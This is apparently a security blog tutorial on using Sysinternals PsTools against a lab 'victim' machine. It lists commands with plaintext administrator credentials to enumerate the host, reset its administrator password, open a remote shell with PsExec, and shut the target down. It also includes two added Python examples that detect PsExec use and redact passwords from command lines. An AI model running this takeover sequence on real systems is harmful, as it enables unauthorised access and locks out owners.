
Remote Windows PC Enumeration with PSTools


PsTools, developed by the renowned Mark Russinovich, is a comprehensive collection of 13 exceptional tools designed to revolutionize remote Windows PC enumeration. These command line-based tools provide an unparalleled level of control and flexibility, enabling users to execute application and process commands effortlessly on remote devices. What sets PsTools apart is its unique capability to redirect the output of console applications to the local system, seamlessly integrating remote functionality as if it were running locally.

PsTools is compatible with a wide range of Windows operating systems, supporting Windows versions later than NT. Whether you’re working on your local computer or accessing remote hosts, PsTools offers seamless functionality without the need for manual software installation on the remote system. Additionally, it provides the flexibility to specify alternative credentials, ensuring secure access to remote systems while maintaining complete control.

The standout feature of PsTools lies in its cohesive suite of tools, all prefixed with the “Ps” keyword. This naming convention pays homage to the widely recognized UNIX process listing command line tool named “ps.” By adopting this prefix for all the tools, PsTools consolidates them into a powerful and unified suite, streamlining your workflow and enhancing efficiency.

With PsTools at your disposal, you can delve into the depths of remote Windows PC enumeration like never before. Whether you need to gather system information, monitor processes, or execute commands on remote devices, PsTools offers an extensive range of capabilities to meet your specific needs. Experience the unmatched power and versatility of PsTools today and unlock a new level of control over your remote Windows PC enumeration tasks.


Download the PsTools kit from https://technet.microsoft.com/en-us/sysinternals/pstools.aspx

PsTools contains the following tools in a single kit:

  • PsExec – used to execute processes remotely
  • PsFile – to show files opened remotely
  • PsGetSid – displays the SID of a computer or a user
  • PsInfo – lists information about a system
  • PsPing – measures network performance
  • PsKill – kills processes by name or process ID
  • PsList – lists detailed information about processes
  • PsLoggedOn – see who’s logged on locally and via resource sharing (full source is included)
  • PsLogList – dumps event log records
  • PsPasswd – changes account passwords
  • PsService – view and control services
  • PsShutdown – shuts down and optionally reboots a computer
  • PsSuspend – suspends processes

Let’s move on to how to use PsTools from the command prompt.

First, open your command prompt and change to the PsTools kit directory using the cd command.

Note: If you see a dialogue box like the one shown below, always click AGREE to run, or else the commands will not work.


Get SID

  • Once you are in the PsTools kit directory, run the dir command to see the list of all the tools.
  • Now, we run a command that uses the PsGetSid tool from the kit. The command is:

          PsGetsid64.exe \\192.168.1.104 -u administrator -p Ignite@123

  • Here,

      192.168.1.104 –> our victim’s IP
      -u –> denotes username
      administrator –> username
      -p –> denotes password
      Ignite@123 –> password

System Information

  • We will use this command to retrieve the system information of the remote PC.
  • Next, we’ll learn about the psinfo.exe tool, which gives us all the necessary information about the remote PC. To make this tool work, type:

psinfo.exe \\192.168.1.104 -u administrator -p Ignite@123

Share Folder

This shows the files in the remote PC’s shared folders that are opened remotely.

  • Moving forward, we will now run the psfile tool by typing the following command:

psfile64.exe \\192.168.1.104 -u administrator -p Ignite@123

Running this command lets us see every file and directory that is remotely open on the victim’s PC.

Process Information

  • Next is the pslist tool. Run it using the command below:

pslist64.exe \\192.168.1.104 -u administrator -p Ignite@123

Services

Psservice.exe lets us know all the running services on our victim’s PC. The command is:

PsService64.exe \\192.168.1.104 -u administrator -p Ignite@123

Log List

The Psloglist.exe tool helps us see the logs of the victim’s PC. To do so, run the following command:

psloglist.exe \\192.168.1.104 -u administrator -p Ignite@123

Change Password

Pspasswd64.exe is the most important tool, as it lets us change a password on the remote PC. To do so, use the command:

pspasswd64.exe \\192.168.1.104 -u administrator -p Ignite@123 administrator forever

Here,

      192.168.1.104 –> our victim’s IP
      -u –> denotes username
      administrator –> username
      -p –> denotes password
      Ignite@123 –> password
      administrator –> username (specify a user to change)
      forever –> new password

Remote Connect Shell

PsExec64.exe is another important tool, which takes us directly into a shell on the victim’s PC. Its command is:

PsExec64.exe \\192.168.1.104 -u administrator -p forever cmd
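
On the target, PsExec runs the command through a service named PSEXESVC that it installs, which the System log records as event 7045, preceded by a network logon (Security event 4624, logon type 3). The added example below, which is not part of the original article, pairs the two in constructed sample records; the source address 192.168.1.50, the timestamps and the other service are made up for the illustration.

```python
from datetime import datetime, timedelta

# Constructed, simplified records that reuse the field names of Windows events
# 4624 (Security log, logon) and 7045 (System log, service installed).
EVENTS = [
    {"time": "2024-01-14T10:00:01", "id": 4624, "LogonType": 3,
     "TargetUserName": "administrator", "IpAddress": "192.168.1.50"},
    {"time": "2024-01-14T10:00:03", "id": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2024-01-14T11:30:00", "id": 4624, "LogonType": 2,
     "TargetUserName": "alice", "IpAddress": "-"},
    {"time": "2024-01-14T11:30:20", "id": 7045, "ServiceName": "VendorUpdater",
     "ImagePath": r"C:\Program Files\Vendor\updater.exe"},
]

def is_psexec_service(event):
    """True for a 7045 record whose service name or binary is PSEXESVC."""
    if event["id"] != 7045:
        return False
    binary = event.get("ImagePath", "").replace("/", "\\").rsplit("\\", 1)[-1]
    return (event.get("ServiceName", "").lower() == "psexesvc"
            or binary.lower() == "psexesvc.exe")

def find_psexec(events, window_seconds=30):
    """Pair each PSEXESVC install with the network logon that preceded it."""
    window = timedelta(seconds=window_seconds)
    logons, findings = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4624 and ev.get("LogonType") == 3:
            logons.append((when, ev))
        elif is_psexec_service(ev):
            recent = [rec for t, rec in logons if when - t <= window]
            src = recent[-1] if recent else {}
            findings.append({"time": ev["time"], "service": ev.get("ServiceName"),
                             "source_ip": src.get("IpAddress"),
                             "user": src.get("TargetUserName")})
    return findings

if __name__ == "__main__":
    for finding in find_psexec(EVENTS):
        print(finding)
```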

Shutdown

Lastly, the Psshutdown tool helps us shut down the remote PC. Just type:

psshutdown.exe \\192.168.1.104 -u administrator -p forever

It will take 20 seconds to shut down the PC after you execute the command.

So, these were the tools in the PsTools kit and the commands to run them. These tools really make our work a lot easier and come in handy. That’s all for Remote Windows PC Enumeration with PSTools.
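
Every command in this article passes the account name and password as -u and -p arguments, so both end up in any process-creation log that records command lines. The following added example, which is not part of the original article, triages such command lines, flags remote PsTools use and redacts the passwords; the sample lines, the C:\Tools path and the medium/high grouping are assumptions made for the illustration.

```python
import re
import shlex

# Base names from the kit list above; STATE_CHANGING tools alter the target.
PSTOOLS = {"psexec", "psfile", "psgetsid", "psinfo", "psping", "pskill", "pslist",
           "psloggedon", "psloglist", "pspasswd", "psservice", "psshutdown", "pssuspend"}
STATE_CHANGING = {"psexec", "pskill", "pspasswd", "psshutdown", "pssuspend"}

# Constructed process-creation command lines, modelled on the commands in this article.
SAMPLES = [
    r"psinfo.exe \\192.168.1.104 -u administrator -p Ignite@123",
    r"pspasswd64.exe \\192.168.1.104 -u administrator -p Ignite@123 administrator forever",
    r'"C:\Tools\PsExec64.exe" \\192.168.1.104 -u administrator -p forever cmd',
    r"pslist64.exe",              # local use, not reported
    r"notepad.exe C:\notes.txt",  # unrelated process
]

def triage(command_line):
    """Return a finding for a remote PsTools invocation, else None."""
    try:
        tokens = shlex.split(command_line, posix=False)  # keeps \\host intact
    except ValueError:
        tokens = command_line.split()
    if not tokens:
        return None
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    m = re.fullmatch(r"(ps[a-z]+?)(64)?(\.exe)?", exe)
    args = tokens[1:]
    target = next((a[2:] for a in args if a.startswith("\\\\")), None)
    if not m or m.group(1) not in PSTOOLS or target is None:
        return None
    tool, low = m.group(1), [a.lower() for a in args]
    user = args[low.index("-u") + 1] if "-u" in low[:-1] else None
    has_pw = "-p" in low[:-1]
    if has_pw:
        args[low.index("-p") + 1] = "<redacted>"
    if tool == "pspasswd":  # positionals are: account name, then new password
        skip = {i + 1 for i, a in enumerate(low) if a in ("-u", "-p")}
        pos = [i for i, a in enumerate(args)
               if i not in skip and not a.startswith(("\\\\", "-"))]
        if len(pos) >= 2:
            args[pos[1]] = "<redacted>"
    return {"tool": tool, "target": target, "user": user, "cleartext_password": has_pw,
            "severity": "high" if tool in STATE_CHANGING else "medium",
            "redacted": " ".join([tokens[0]] + args)}

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```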

About the author 

HACKABEAST

January 14, 2024
